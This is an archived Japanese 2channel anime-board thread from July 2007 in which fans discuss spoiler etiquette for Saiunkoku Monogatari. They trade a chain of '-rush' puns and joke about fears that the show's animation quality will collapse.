114 :風の谷の名無しさん@実況は実況板で:2007/07/09(月) 01:56:54 ID:ZCcwQJaw
>>112
え、なになに?
奇人てばイケメンなの?

>>113
自分初視聴組で、ネタバレはネタバレ表記あれば構わんけど
ネタバレと分からん中途半端が一番困る。

115 :風の谷の名無しさん@実況は実況板で:2007/07/09(月) 03:25:43 ID:spUIugcD
>114
うっ たしかに ネタバレになってるな 上の会話って
2週もあいてたものだから どこまで回が進んでいたのか混乱してしまっていて
つい調子にのって >106の書き込みしてしまいました
申し訳なかった 自嘲します


116 :風の谷の名無しさん@実況は実況板で:2007/07/09(月) 10:20:56 ID:siH7aHdp
美顔フラッシュ だったとオモ>奇人

117 :風の谷の名無しさん@実況は実況板で:2007/07/09(月) 12:21:48 ID:MUqM7izn
パトラッシュだお(´・ω・`)

118 :風の谷の名無しさん@実況は実況板で:2007/07/09(月) 21:21:48 ID:yH21DtpZ
ギルガメッシュ

119 :風の谷の名無しさん@実況は実況板で:2007/07/10(火) 00:16:50 ID:0XUwejsr
通勤ラッシュ

120 :風の谷の名無しさん@実況は実況板で:2007/07/10(火) 00:28:52 ID:M9iPg6cr
作画クラッシュ

121 :風の谷の名無しさん@実況は実況板で:2007/07/10(火) 14:29:14 ID:a1DeUrGO
>120
いやぁーそれだけはクラッシュしないで!

122 :風の谷の名無しさん@実況は実況板で:2007/07/10(火) 15:31:02 ID:R40wPXEF
ハゲドー
彩雲国がヤシガニみたいになったら泣くお
作画だけはクラッシュせんでくれ!
通勤ラッシュの電車に閉じ込められるより辛い(;_;)

123 :風の谷の名無しさん@実況は実況板で:2007/07/10(火) 18:48:15 ID:s++vbur6
>>122
通勤ラッシュの方が辛いだろう。

124 :風の谷の名無しさん@実況は実況板で:2007/07/10(火) 21:16:17 ID:CLoyjSum
微妙にヤシガニってるところはあるが
そこは目をつぶることにしている

125 :風の谷の名無しさん@実況は実況板で:2007/07/10(火) 21:48:29 ID:oIl2E07N
じゃ、動画フリーズ!

34 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)